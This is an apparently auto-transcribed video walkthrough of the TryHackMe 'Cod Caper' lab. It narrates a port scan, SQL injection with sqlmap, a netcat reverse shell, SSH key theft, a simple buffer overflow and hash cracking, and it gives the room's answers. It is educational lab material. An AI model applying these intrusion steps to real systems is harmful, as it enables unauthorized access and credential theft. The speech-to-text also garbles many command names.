 Hello everybody, this is John from the future. I'm doing a little quick edit at the beginning of this video so I can include this little announcement. I'm really excited about this. I hope you guys are as well. The past couple of days I just spent some time building, creating, developing a try hack me room. So I'm very, very excited about this. I kind of have my own custom one out there. It is being released tomorrow, May 20th or sometime around then. Hopefully you can keep an eye out for it and check it. But Peek Hill is a new room that I'm very excited about. Peek Hill, P-E-A-K-H-I-L-L. And I am pleased with it. It sounds like everyone that play tested it had a lot of fun. So I'm really looking forward to it. I hope you guys go check it out. And I'm so, so grateful for your support. Thanks so much. Hope you guys enjoy the video. Take care. Hello everyone, my name is John Hemmond and welcome back to another try hack me video. In this video, I want to be taking a look at the cod caper room. It is a free room so you do not need to be subscribed to access it. It says it is a guided room taking you through infiltrating and exploiting a Linux system. So I have it deployed already. I'm joining this room and I've got a little IP address setup and created for me. The background on this and this is a good guided one. It explains hello, my name is whatever that is. I've come here to put in a request to get my fish back. Exciting. Looks like he's banned from something, et cetera, et cetera, et cetera. It looks like we need some basic pen testing knowledge and we're not going to be going through every tool in detail. So let's just jump in. Okay, cool. We've read that. Let me move over and make a directory for the cod caper. Caper. And let's go a little read me going. Let's see. Where's my sublime text? Okay, so the cod caper, code caper, that's also cool. Okay. You know I can't type. I don't know why you guys even follow. I don't know why you even watch this, this series, this YouTube channel. I don't know if you can hear that ambulance driving by, but that's totally getting in the way. Task one, no answer needed. Task two, I just like to have some documentation. Sorry, I know it's stupid. Host enumeration. Looks like we want to go ahead and run Nmap. Okay, so I should probably start that up. Let's create an Nmap directory. Let's go ahead and get that IP address in the scope for our terminal and let's fire that off. Nmap initial on the IP address. Okay, I should be able to ping him just fine. I believe he's up already. Yep, okay, cool. So let's let that go. How many ports are open on the target machine? While that's scanning, let's just kind of throw these in our little write up here. I like to do this even if it's just crappy, because hey, you might be able to just kind of throw this up on GitHub or Medium and be like, yo, this is my write up of this thing that I did. And you can put in as much as you want to in this. I just like to slap in like Nmap scan results if it's on a separate file or any of those things, but I just like to have an extra copy of all of these answers when I go back to them. This does discuss a little bit of Nmap, showcasing some of the arguments and switches and parameters you can give to it. I think I've covered Nmap a lot in a lot of my different videos and I've used it all the time. So that TACSC script that I always throw in will run default scripts on the port. The TAC Capital A will go into aggressive mode. That will try and get as much information as possible. Anyway, let's go see what we've got here. Only two ports, it seems. Okay, so 22 and 80. There are two ports on that box. Let's go ahead and slap that in as our answer. What is the HTTP title of the web server? So with that default scripts, TACSC, it did already track that down. It's just the Apache 2 Ubuntu default page. So let's go ahead and copy that string and slap that in as the answer. Again, we can keep note of that here. What's the version of the SSH server? Open SSH, seemingly Ubuntu. Throw that guy in. I don't think we need the parenthetical. Okay, that looks like more of the format that Traghack me needs. Did I throw that in the wrong spot? What is the version of the SSH service? Oh, oh, oh, oh, I totally missed a box here. You guys should have told me. Guys should have just screamed at your computer screen and obviously I would have heard it. Version of the web server. Do we have a version? Yes, we do. Okay, still output from Nmap. Slap that guy in. What format does that need to be in? Oh, oh, oh, it looks like that as the server header is what it's asking for. Maybe? Yeah, okay, cool. I like that Traghack me gives you those little asterisks and helps you showcase what you're really trying to submit. So because we know that this is running Apache or it has a web service on here, we can go ahead and kind of brute force directories or some files or content that might be available on that website. They actually give us a link here. So let's go ahead and download that for the word list that we will use to go ahead and pull down or try and hammer the website to see if there's any actually interesting text files that might be potentially there or PHP files or directories or anything that we'd like to look for. GoBuster is an awesome tool to do that in. So I'm going to go ahead and fire that up. I'll use GoBuster attack you on HTTP RIP address. I'll use the word list of big and I'll supply some extensions here because they kind of suggested it, SH, text, CGI, JS, CSS, HTML, maybe some Python files, whatever we might happen to want to search for. See what we got. What is the name of the important file on the server? I don't know. Task three, just slapping these answers and questions in for good documentation. What is happening? What is going on? A lot of nonsense in here. Failing to parse some stuff. That is not what I expected. Okay. Is it adding more to that? No, it is. Yeah, it definitely is. Maybe I don't need to look for all of those extensions. Maybe let's just look for PHP text and HTML. Quality content. I have no idea what that could be because that's a long, long file name and obviously a three little one could be PHP, it could be text. Let's go take a look at that web server though. Let's go see what this website actually has to be displayed on it for us. A default page. That's why we're running Go Buster. I'm a fool. What is going on guys? What is all this? All right, let me pause this to figure this out. Okay, so I realized the error and I realized kind of my mistake. I'll show you just kind of my troubleshooting process. I redirected the output or the standard error of Go Buster to Dev. No, I'm just grep for 200. So I would only be able to see things that would have a successful return and then I was like, what is that big list actually returning for me? And I realized, oh, it is an HTML file. It is not a word list. So the fact that I used Wget probably kind of borked that. So let's go ahead and redownload that and ideally that will work better now. Okay, it's not an actual text file. That's exactly why. Now that that's moved to downloads, let's copy that over here. Let's move our downloads big.text into this guy. Is he still going? No, he's good. What do you mean it's not downloaded? Where'd you put him? Whatever. Oh, it put him in my home directory. Google Chrome. How could you do this to me? All right, so now let's fire that back up and hopefully that should work. Some learnings, some mistakes. And I was trying to be nice and clever but I was using a simple Wget. That big.text was mixed leading. I thought they were giving me a real text file not a GitHub link. I guess I should have looked. Let's blame me. So what is the potential interesting stuff in here? .htpassword seems kind of peculiar. .htpassword.text might be useful. Oh, PHP, I probably won't be able to read. .htaccess is all accessible. That one in here. How about .htaccess.php? Nope. Okay, I guess we're still gonna be waiting. Can I access those? Can we go see what those have? Let's go back to that website. Let's see what we got. There's our flat page. Let's check out.htaccess.text. I'm not allowed to view those. I probably should have known that by looking at the status. We'll stand by. I'll keep waiting for GoBuster to finish that up. Okay, so now I see an administrator.php. That sounds like the right number of characters and is probably an interesting page. So let's try that guy. Looks good. All right, let's throw him in our notes here. And let's keep moving on. Web exploitation. The admin page seems to give us login form and situations like this that's always worthwhile to check for the low-hanging fruit. Case of login form is one of the first things to check for is SQL injection. So they actually showcase SQL map here and they suggest using the .htac.u argument to specify the URL, dumping stuff with forms or just grab everything from the database. So do I actually have SQL map installed here? I don't think I've used it in a bit. SQL map. Nope. All right, let's fire that up. It's probably not the best to take it from the repositories. It would be a much better idea to pull it from the GitHub repository. But I just kind of want to move through with some speed here because I think we've dobbled enough in this video. So, all right, cool. SQL map. Why do I keep doing that? Now that you're in my path, great. Let's fire that up. The IP address is this guy. So let's fire that in. SQL map. .htac.u, let's go to take a look at that page first and see what it actually looks like administrator.php. Okay, just needs a login but it's probably vulnerable to SQL injection. Let's try SQL light. Nope, let's try regular SQL. Try again. One equals one. Try again. Does that need to be in the path? Okay, let's just run our stinkin' SQL map and try it up. Let's use tag, tag form and that needs to be on the administrator.php. Using tag, tag form because there isn't an argument through get that we're passing, this is all through post. So we won't be using anything after like a question mark var equals value in here. It's going to be determining it on the form on the page here because it's a post method. Go. Yep, test that form. Do it, do it. Fill it with random data, figure it out. Looks like the backend database is my SQL. Do you want to skip payloads? My face is in the way. Yeah, we want to skip payloads. We don't need to do that stuff. Yes, go ahead and continue with all of the tests. SQL map likes to be very inquisitive. It's very, very curious. Let's see if that gets any results for us. Okay, SQL map seemed to find some things where it's thinking a post parameter is injectable but it's asking, do you want to try with random characters rather than null values? And I say, yes, that's totally fine. Just keep beating it up. And maybe you'll track down and potential injection. Great, now I figured out that username variable is vulnerable and we can inject into it. Do you want to test any others? I'm going to say no here and that you want to exploit this SQL injection. I'm going to say yes. And now we have that kind of payload saved in cache so SQL injection can use it later. I do want to specify the TAC-TAC A because that will dump everything from the database, as it said, not TAC-TAC, just a regular hyphen, just a TAC, grabs just about everything from the database. Let's grab it all. Let's see what you can get. You will probably need to go select and enter everything that I already found. Test parameters don't need to be injectable. Well, you already found this. You already figured this out. I hate doing this because when I use TAC-TAC form it doesn't particularly have an idea what I'm referring to. Let's just try and use TAC-TAC data. Is that a thing? Let's check out the man page for SQL map. Data, string data to be sent through post. So I'll use TAC-TAC data and username equals so we can supply that field. I'm gonna use an ampersand here and password equals. Because I'm using that ampersand Bash might interpret that as me trying to background a job. So I'm gonna use single quotes here and let's see if that gets the exploit in okay. So now I can use TAC-A and start to leak out everything. So that TAC-A as was suggested in the text here will retrieve some password. Do you wanna store hash to temporary file for eventual further processing with the database tools? Yeah, that's fine. Go ahead and perform a dictionary based attack on those password hashes. Feel free to do it with the default dictionary. No, we don't need to use password suffixes. Let's see if it tracks anything down. So maybe this is a hash for root. Oh, looks like it cracked some passwords here. Okay, roots password is simply root and maybe that will work. Maybe that is the answer. Okay, so it's dumping out all the privileges. Wow, there's a lot of stuff in here. I've never actually used TAC-A for SQL. Matt, that's kind of cool. Is this password? Oh, it's not just straight root. We need to know the admin password. How many forms of SQL injection is a form vulnerable to? We found three for the time base error, the error base, or injection, time base injection, error base injection and blind injection. It's retreating a lot of stuff. I don't know if I want all of those. Can we just dump the database's name? Or maybe it is, maybe that's really helpful. I'll just leave it on and we'll pause. You know what? That is taking a long, long time and it's getting some useless things that I don't care about. So I am gonna break that and let's just use TAC-TAC DBs to leak out the database's information schema. Okay, it already found some of these. So let's just use TAC-TAC D users and then, oh, sorry, TAC-D users and then TAC-TAC tables to dump out the tables. There we go. So users, okay. Now I can specify TAC-T for users and let's dump that out. Username password, there we go. Okay, so username pingudad and password is secret pass. So let's slap that in and pingudad, pingudad. Wow. All right, I'm going to steal that syntax and just kind of slap it in here for our notes. I'll actually also keep track of that command. I'll copy and paste that guy. There we go. And I guess I won't bother filling those in. Let's do some command execution. It seems we've gained the ability to run commands. Since this is my old PC, I should still have a user account and turn a few test commands and try and get access. It probably just was going to allow us some communication on like some ability to actually run commands on the admin panel. Now that we have logging credentials, we could probably do that. That's totally fine. Okay, so if we wanted to run commands, we could just run LS and kind of see some things around here, but we could try and get a shell. So what I'm going to do is I'm actually just going to fire up Quake and use my poor man's pen test because it looks like if we have that Netcat on the box, we could slap in a Netcat reverse shell and then go ahead and get that connectivity. So now that that is accessible for us, let's try and see if we have Python, Python taxi, print, whoop, please sub, son, I suck at typing. That works. Let's go ahead and stabilize this shell. And now we should have a usable utility. Okay. What is it asking for following this? How many files are in the current directory? We saw three here. Do I still have an account? Let's cat out its password and see Pingu. He exists. So let's say yes. I'm assuming that's it because it's three letters. Yep, that's fine. What is my SSH password? Well, let's go into home and he has a home directory. So let's go check that out. Is there anything in here? There is nano. That's a directory. He also has SSH in here. What is SSH password? Would it be, he doesn't have any bash history, GB history, which is kind of interesting. Maybe he has something in nano. NLS, tech LA, nothing in here. So no history in that. Well, we could go ahead and get his SSH key. Maybe that has a password set on it. Maybe that's what it's referring to. Let's cat out that IDRSA key. So we have his private key and let's go ahead and create a directory to actually interact with that. That put me in my CAUTH directory because that is where Wake tends to live. So let's say Pingu, IDRSA, slap that in, make that something that SSH is willing to use. And let's actually grab our IP address because I'm in a new shell. So I can SSH, tech I, that guy at Pingu at the IP address. Log me in please. Yep, that's totally fine. And he needs a password. That's not secret pass again, is it? Could we brute force that with Hydra? What am I missing? Why do I not see his password? Well, if I go back and read the prompt here, assume my father hasn't modified to go to my LPC. I should still have my hidden password source somewhere. We don't know where it is so we could find it with find, search for files that a specific user owns. So let's go to the root directory and let's do find directory, user, tech user, Pingu. And let's force all of that bad noise to DevNull. And let's see if he has any files that he owns. That might take a little bit of time to come through. Now cache, is that it? Nope, it'd be weird to see it in GDB history. Whatever, let's just friggin' get Limpies in here because I'm not seeing it in that. Now that we have Limpies, let's mark that as executable, run it and tee that to linlog. So we have some saved output. And let's look for some interesting things. So the MySQL database is in there. Papa, that's the other user. Those are all the MySQL strings we were able to determine already. Natural R sync, private SSH key, yep, we've got that. But we need to know his password. Maybe there is some stuff that Papa owns that is interesting. Oh, var backups shadow.back. Let's take a look at what that guy is. I can't read that, okay? Okay, after a good while of looking around, I think I found it. Ended up finding it manually in the var directory with a little folder named hidden and there is a pass file there and is a ping you ping you. So that is the password. There we go. I guess I had not found that because it is not owned by ping you. It is owned by the www data user, which I guess I maybe I'm just stupid. Maybe I just didn't think of that. But obviously if we were to go run our find command again and I tried to add some other arguments like, hey, why can't I find this? Apparently the user is not ping you. It is www data. So let me this guy. There we go. Interesting. Okay, that's that. Now we could totally SSH in that machine. So let's SSH tack I that ping you ID RSA to that ping you user on the IP address and checking that password again, just to jump in here. There we go. Now we are logged in via SSH. So it's telling me to go ahead and do some Linenum. I would do the same with Limpies. So that should still be executable. We can go ahead and run it one more time. It's apparently looking for interesting SUID binaries. Maybe I had not found it or it just didn't look for it due to checking passwords or there might be some peculiar ones in here. SUID new group CHFN. Looks like it has an interesting path with a long name in the middle. Secret root, that one that I found earlier. I don't know why I missed that. Let me go ahead and add some more time to this because it has taken me way too long to go track through this. Opt secret root is what we're looking for. Good. Looks like this is a binary. Can I go check that out? Can I hop over there? Lest hack LA file root. I can execute it. It is a binary. Able to grab the source code for my dad's flash drive. It has a shell function interestingly enough that we'll go ahead and cat out the var backup shadow back which looks like a backup of it's at reshadow and we'll read an input. Okay, so this looks like a classic buffer overflow. So it's going through in the try hack me walkthrough explaining this is what you could do with Pwn debug or some added plugins for GDB. I've showcased a couple of command line Linux buffer overflow stuff before. So what I'll end up doing is actually just using read elf to go ahead and determine the address of that shell function and then doing kind of their trick to exploit it manually using Python to print all that out. It looks like they have Python two in here so that should be accessible if we were to do with Python three. Let me check if Python three is in here. It is. Okay, great. So I'll use Python three in that case. Hopefully get that right. Do we have read elf? We do. So let's go ahead and read elf the symbols on that binary here and the shell function has this address. So if we were to use cyclic which I don't know if we have. Okay, we do because it gave us Pwn tools in here. Nice. Go and check for some versions of Pwn tools which this machine probably doesn't have internet so that won't work. We totally don't have Metasploit but we can go ahead and use Pwn cyclic on our own machine. So let's get cyclic 50 and let's throw that at the binary. I'm not dub dub dub shell. I guess I don't need anymore. So let's echo tack any that cyclic pattern into root and see where it crashes. We get a segmentation fault. I'm gonna run D message to go see where that's at and then I'll go ahead and cyclic. I think it's tack L to look up and I think it needs a zero X in here or maybe it doesn't. Okay, sub pattern must be four bytes. So it totally does. Maybe it's tack Q or tack P tack L. Hello. Oh, that might be whining because it's doing some Python three things and maybe that is specific to Python two. Okay. So now if I use that look up and I'll use zero X here, 44 is the offset, which is good because that matches kind of what the try hack me room was walking us through. So we know our read Elf tack S on root with the shell function. Oh, Crip shell. So that is the address that we need. So Python two, let's go ahead and print out nonsense 44 times to get to the offset where we can go ahead and grab the instruction pointer and now let's import struct over at the beginning of that. So we can struct dot pack and make that and some bytes we could supply use zero X to include that. I'll close that and that. So now we have the raw bytes and we'll go ahead and pass that to the root function which will cat out the backup file for us. There we go. We could do that with Pwn tools just as easily and that's the next section that they discuss. They actually offer the script here where they're doing that. They use Pwn tools to create a process, grab the Elf file so it has the binary and search for the actual address of the shell function and they do a really cool technique. I actually haven't seen that fit function before where it'll fit 44 characters and then grab the shell function right after it. So that's kind of neat and then just sends it along and makes it interactive. So same sort of technique, same thing, just some Python Pwn tools access and there we go. Mark that as complete and now we need to go ahead and crack that hash. So they're using hash cat. I think I'm just gonna go ahead and use John. There we have Papa here as his string. So I'll go back to my host and I'll just say subbell shadow. I'll pass that guy in and I'll use opt. John the Ripper run john tactac word list equals opt rocku.txt and I'll run it on that shadow file. Okay. Now I found the password there. It is postman. So back to our shell. We could SEO to Papa enter postman as our password. Now we are Papa and submit postman here. What, what, oh, what is the root password? I'm sorry. That's not Papa. What can Papa run? Can he escalate our privileges? Nope, we can't pseudo. Well, what else could we potentially do then? Maybe in that output, we actually had a root password. Could we crack that? Let's include that guy here, run that one more time and let's see if John the Ripper could crack that. I guess I'll go ahead and go check out if there's any routes for privilege escalation with the Papa user while that's going. And okay, actually John the Ripper was able to go ahead and crack that root password. So that answer is love to fish. There we go. Now we could just go ahead and switch user into root, use his password here. And is there anything in the root directory? Nope, so no root flag to go into. Looks like that's just a simple thank you and says, great, we completed the room. So okay, that was that. Wow, that took a little bit of time. I was fumbling a lot on that one. I hope you guys enjoyed. That was kind of cool to get a little bit of binary exploitation or at least just a simple classic buffer overflow. And they do a really good job of showcasing the different ways to go about this. Pone Debug is kind of cool, giving you the source code to kind of understand where that vulnerability comes from and being able to go determine, okay, what's the address and where can we track down all of that information to build that buffer overflow in that classic exploit. Okay, that's that. That's all I wanted to cover. Thank you guys so much for watching. If you did like this video, please do hit that like button, comment, do the YouTube algorithm stuff. Please subscribe. I'd love to see you guys. Love to see you in the Discord server. Love to see you on Patreon, PayPal, LinkedIn, Facebook, Twitter, Instagram, all those other things. Thank you. Bye.